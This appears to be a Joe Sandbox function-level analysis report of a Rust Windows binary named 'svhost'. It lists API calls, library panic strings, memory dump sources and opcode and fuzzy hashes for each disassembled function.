                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 00007FF7AF5A5617
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 00007FF7AF5A5636
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: f03e7eaaaa7e6accce8893c1232be6072bed80854956d9c8a5bf3ca76ce815f1
                                • Instruction ID: 7ad4f517087dc7991d96a85b32f277a2c7f09ed72298707cb1b578e413218ef3
                                • Opcode Fuzzy Hash: f03e7eaaaa7e6accce8893c1232be6072bed80854956d9c8a5bf3ca76ce815f1
                                • Instruction Fuzzy Hash: D6618D26A0AB9699FB10FB64A444AECB7B4BB08798FC60135DE8D137A5DF38D155C320
                                Function 00007FF7AF702CD0 Relevance: 7.7, APIs: 5, Instructions: 155COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                • String ID:
                                • API String ID: 1956605914-0
                                • Opcode ID: 8f169e598f4eea753c1ea8357704a023fbad1311f18d6ab57a4d7fc53500541f
                                • Instruction ID: a9fbe57be0b037382a30fce2a318120099d0b2fedf1e7ea589377315ab128e55
                                • Opcode Fuzzy Hash: 8f169e598f4eea753c1ea8357704a023fbad1311f18d6ab57a4d7fc53500541f
                                • Instruction Fuzzy Hash: 1A51A22AA0A69242F720AB15F8443F6E251FF88780FE64135DA8D427F4DF7CD985C720
                                Function 00007FF7AF6FB270 Relevance: 7.7, APIs: 5, Instructions: 155COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ErrorLast$FileModuleName
                                • String ID:
                                • API String ID: 1026760046-0
                                • Opcode ID: 66b0cbe6368fdbaea4a49407f0eba46077828b4dc0fb0bd3fe1166b0fc60249e
                                • Instruction ID: 006d489c6540a345794b9bea6e887cb02a547d72d50f48b7cf7ce67f032e9c61
                                • Opcode Fuzzy Hash: 66b0cbe6368fdbaea4a49407f0eba46077828b4dc0fb0bd3fe1166b0fc60249e
                                • Instruction Fuzzy Hash: 3C51E423A067C256EB71AF21E8047F9A359BB08BA8FD65231DD5C477E4DE3CD2858310
                                Function 00007FF7AF695910 Relevance: 7.6, APIs: 5, Instructions: 144COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(00000004,00000068,-00000010,?,00007FF7AF84F648,?,00007FF7AF67D92A,00000004,00000000,00000000,?,?,00007FF7AF672532), ref: 00007FF7AF69592C
                                • ReleaseSRWLockExclusive.KERNEL32(?,00007FF7AF84F648,?,00007FF7AF67D92A,00000004,00000000,00000000,?,?,00007FF7AF672532), ref: 00007FF7AF6959C6
                                • AcquireSRWLockExclusive.KERNEL32(?,00007FF7AF84F648,?,00007FF7AF67D92A,00000004,00000000,00000000,?,?,00007FF7AF672532), ref: 00007FF7AF6959F3
                                • ReleaseSRWLockExclusive.KERNEL32(?,00007FF7AF84F648,?,00007FF7AF67D92A,00000004,00000000,00000000,?,?,00007FF7AF672532), ref: 00007FF7AF695A84
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID:
                                • API String ID: 17069307-0
                                • Opcode ID: d9d2b1c4c8e52270aa75e95fc1bab92bc23ae31146168f485dbf7f732f198ce9
                                • Instruction ID: c44f707092da960011d6b2b9667c7bfedfe0de32b6052e0578fa4d2a9eb15b09
                                • Opcode Fuzzy Hash: d9d2b1c4c8e52270aa75e95fc1bab92bc23ae31146168f485dbf7f732f198ce9
                                • Instruction Fuzzy Hash: 6551B12670ABC186EA249B16E0803BDA3A1FF44B94F955161DF9E077A1CF3DE842C320
                                Function 00007FF7AF605230 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 351COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: FieldSet corrupted (this is a bug)$called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2166623782
                                • Opcode ID: dc32665033ce9beca331e6873fe34ea8a9f78b813fe12977fd89d8744d398181
                                • Instruction ID: 97927fab08180b059e1d8b2530cae0448f6be310153eb29b0b6053aecc244baf
                                • Opcode Fuzzy Hash: dc32665033ce9beca331e6873fe34ea8a9f78b813fe12977fd89d8744d398181
                                • Instruction Fuzzy Hash: 2FF19026A0ABC18AE7119F25D4403EC77B5FB19748F959236EE8C037A6DF38E495C310
                                Function 00007FF7AF60FFB0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 299COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$Release$Acquire
                                • String ID: FieldSet corrupted (this is a bug)
                                • API String ID: 1021914862-3324409646
                                • Opcode ID: 6ec747fcff487bf893f53a0ffe0670b086990a06f3772fedfb026906a0d525ae
                                • Instruction ID: 9432c8b26ca34ac556185a1c1852edd88308e458b8cbf6767ff98e219c7f30dc
                                • Opcode Fuzzy Hash: 6ec747fcff487bf893f53a0ffe0670b086990a06f3772fedfb026906a0d525ae
                                • Instruction Fuzzy Hash: 88E1AE2290ABC199FB21AF38D8403EC77A5FB15748F855135DA8C07BAADF39E185C361
                                Function 00007FF7AF6F6D60 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 235COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
                                • API String ID: 17069307-3513654867
                                • Opcode ID: 56b31d811df7a4174d92edb95d8d03644e0ebf45d146845905366dfa95b480b7
                                • Instruction ID: 1ffe79a014aef262ea674aa53732658703097717020f69e966fbf5beeed4ff38
                                • Opcode Fuzzy Hash: 56b31d811df7a4174d92edb95d8d03644e0ebf45d146845905366dfa95b480b7
                                • Instruction Fuzzy Hash: B7B1B122A0AAC299FB21EF24D4403F8A766FB54798FC65136DA4D43BA4DF3DE055C360
                                Function 00007FF7AF5ABE40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF7AF5AC0F5
                                • FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.20\src\proto\streams\send.rs, xrefs: 00007FF7AF5AC113
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.20\src\proto\streams\send.rs$called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2374504294
                                • Opcode ID: 5ee0a4af83842b4d8df0d1a673da0088e2e81a5ba30079a6e18e87f6ab49d183
                                • Instruction ID: b62f73290696047e81074a648a1f7f9f9c6f4c7858f81280559062d96536a141
                                • Opcode Fuzzy Hash: 5ee0a4af83842b4d8df0d1a673da0088e2e81a5ba30079a6e18e87f6ab49d183
                                • Instruction Fuzzy Hash: BBA17F26A0ABC199EB11EF24E8443E8B7A5FB48358FC64135EE8C437A5DF38D195C360
                                Function 00007FF7AF623220 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 210COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • buffer space exhausted; sending this messages would overflow the state, xrefs: 00007FF7AF6234B1
                                • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF7AF6234F6
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLockRelease
                                • String ID: buffer space exhausted; sending this messages would overflow the state$called `Result::unwrap()` on an `Err` value
                                • API String ID: 1766480654-1228284763
                                • Opcode ID: dc0a2cc66a090fb44634a5189a8c03fc34b8bd57637c19de235c599e3cf9027c
                                • Instruction ID: 924de8aa52f34acbab5a3c5c406945b80c6347ca02a46f7aa302417f8a08a9fd
                                • Opcode Fuzzy Hash: dc0a2cc66a090fb44634a5189a8c03fc34b8bd57637c19de235c599e3cf9027c
                                • Instruction Fuzzy Hash: 77A1AF22E0ABC189F7119F24D8413EC6B60FB58758F869635DF8C177A2DF38E2958361
                                Function 00007FF7AF688A20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 206COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • assertion failed: prev.ref_count() >= 1, xrefs: 00007FF7AF688B58
                                • cannot access a Thread Local Storage value during or after destruction/rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\std\src\thread\local.rs, xrefs: 00007FF7AF688AF0
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: assertion failed: prev.ref_count() >= 1$cannot access a Thread Local Storage value during or after destruction/rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\std\src\thread\local.rs
                                • API String ID: 17069307-1890929088
                                • Opcode ID: 2e87ad070df6050d406db0980ee0c096055acde26d0db2489fbb43ea5b6f5e3a
                                • Instruction ID: 4ace191927e2b1bbdb4d1b27b5166a26c70373d22c176af70ff21eaeb103b88f
                                • Opcode Fuzzy Hash: 2e87ad070df6050d406db0980ee0c096055acde26d0db2489fbb43ea5b6f5e3a
                                • Instruction Fuzzy Hash: 3181A076A0AB85D6EA10DB15E4803F8A3A0FB48B94F855276DE5D437A0DF38E496C310
                                Function 00007FF7AF6E0110 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 205COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7AF6E0152
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7AF6E03B8
                                Strings
                                • C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rayon-core-1.11.0\src\registry.rs, xrefs: 00007FF7AF6E02BC
                                • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF7AF6E0431
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rayon-core-1.11.0\src\registry.rs$called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-833068510
                                • Opcode ID: 028cf7911e35e1cb0e3111a9da777123dafc5b20120f198a4b30dbced8cdca86
                                • Instruction ID: fd6f6675a601245448451999810672815e316b7a635d857e672328d3013f49c5
                                • Opcode Fuzzy Hash: 028cf7911e35e1cb0e3111a9da777123dafc5b20120f198a4b30dbced8cdca86
                                • Instruction Fuzzy Hash: DBA1C033A0ABD2EAEB00AB65D4403ECA7B5FB14B88F855532CA4D177A4CF39E556C350
                                Function 00007FF7AF63E910 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$Release$Acquire
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 1021914862-2333694755
                                • Opcode ID: 56cf8af7e02cd12a5e185de570f54329755925ea1079acd89e118ff76b6e3bc1
                                • Instruction ID: b707ae01b85cb89b81b69422dbabe72a244cd2ed3c151ad58da511108e429e63
                                • Opcode Fuzzy Hash: 56cf8af7e02cd12a5e185de570f54329755925ea1079acd89e118ff76b6e3bc1
                                • Instruction Fuzzy Hash: 3191C522E0ABD189F7159B64D4403FCB7A5BB18348F865236DE8E13765EF3CA189C321
                                Function 00007FF7AF68E160 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,?,?,?,00007FF7AF584301), ref: 00007FF7AF68E188
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00000000,?,?,?,00007FF7AF584301), ref: 00007FF7AF68E27D
                                Strings
                                • internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.29.1\src\sync\notify.rs, xrefs: 00007FF7AF68E308
                                • assertion failed: self.tail.is_none(), xrefs: 00007FF7AF68E32D
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: assertion failed: self.tail.is_none()$internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.29.1\src\sync\notify.rs
                                • API String ID: 17069307-2477610397
                                • Opcode ID: 4b6e1f3055a75f633c8bb799de9a9c7eb730100a83303e35b18e9b72852aead6
                                • Instruction ID: effaf38adaf7ac4099b5e80392034211dd3550763ac36651a297f8b748db467f
                                • Opcode Fuzzy Hash: 4b6e1f3055a75f633c8bb799de9a9c7eb730100a83303e35b18e9b72852aead6
                                • Instruction Fuzzy Hash: 7C61D226E0AB81D9FB11AFE494007ECB7B4AB29758F855179CE5C133A4CF38E585C360
                                Function 00007FF7AF67D900 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 167COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00007FF7AF695910: AcquireSRWLockExclusive.KERNEL32(00000004,00000068,-00000010,?,00007FF7AF84F648,?,00007FF7AF67D92A,00000004,00000000,00000000,?,?,00007FF7AF672532), ref: 00007FF7AF69592C
                                  • Part of subcall function 00007FF7AF695910: ReleaseSRWLockExclusive.KERNEL32(?,00007FF7AF84F648,?,00007FF7AF67D92A,00000004,00000000,00000000,?,?,00007FF7AF672532), ref: 00007FF7AF6959C6
                                  • Part of subcall function 00007FF7AF695910: AcquireSRWLockExclusive.KERNEL32(?,00007FF7AF84F648,?,00007FF7AF67D92A,00000004,00000000,00000000,?,?,00007FF7AF672532), ref: 00007FF7AF6959F3
                                  • Part of subcall function 00007FF7AF695910: ReleaseSRWLockExclusive.KERNEL32(?,00007FF7AF84F648,?,00007FF7AF67D92A,00000004,00000000,00000000,?,?,00007FF7AF672532), ref: 00007FF7AF695A84
                                • AcquireSRWLockExclusive.KERNEL32(00000004,00000000,00000000,?,?,00007FF7AF672532,?,?,?,?,?,?,00000000,?,?,00007FF7AF67D6B5), ref: 00007FF7AF67D9AE
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,00007FF7AF672532,?,?,?,?,?,?,00000000,?,?,00007FF7AF67D6B5), ref: 00007FF7AF67DA0C
                                Strings
                                • A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.29.1\src\runtime\scheduler\defer.rs, xrefs: 00007FF7AF67DB29
                                • assertion failed: prev.ref_count() >= 1, xrefs: 00007FF7AF67DADB, 00007FF7AF67DAF5
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.29.1\src\runtime\scheduler\defer.rs$assertion failed: prev.ref_count() >= 1
                                • API String ID: 17069307-1329610437
                                • Opcode ID: c69be997ef408bc51d0cc326a8a74d7e633a81665385b84b20800d60388d4336
                                • Instruction ID: 8de410fbc48692b540e73af18124859cc712041bedfff94421b09dbf5851946b
                                • Opcode Fuzzy Hash: c69be997ef408bc51d0cc326a8a74d7e633a81665385b84b20800d60388d4336
                                • Instruction Fuzzy Hash: 9A61C266A0A7C285FE11AB65E4402F8A365BB457A4FC65B32DA6D033F1DF3CE545C320
                                Function 00007FF7AF6F4A90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                Download Yara Rule
                                APIs
                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00000000,?,00007FF7AF6F4A79), ref: 00007FF7AF6F4AC6
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00000000,?,00007FF7AF6F4A79), ref: 00007FF7AF6F4C3B
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ErrorFrequencyLastPerformanceQuery
                                • String ID: called `Result::unwrap()` on an `Err` value$overflow when subtracting durations
                                • API String ID: 3362413890-1633623230
                                • Opcode ID: 88b6f7a65ebd7643fa6e0e8cb94f897e64dc3c2bb4224f6738f97032cbb81e81
                                • Instruction ID: 928d035c539a2d892910b17aa04c24c235e3c07e5d1193018b710d261ab4de8c
                                • Opcode Fuzzy Hash: 88b6f7a65ebd7643fa6e0e8cb94f897e64dc3c2bb4224f6738f97032cbb81e81
                                • Instruction Fuzzy Hash: FE510B27F1B68255FB24EB64D8403F8936AAF94394FD6D132D90E42EB4DE3CA545C320
                                Function 00007FF7AF63D8B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 133COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7AF63D8DF
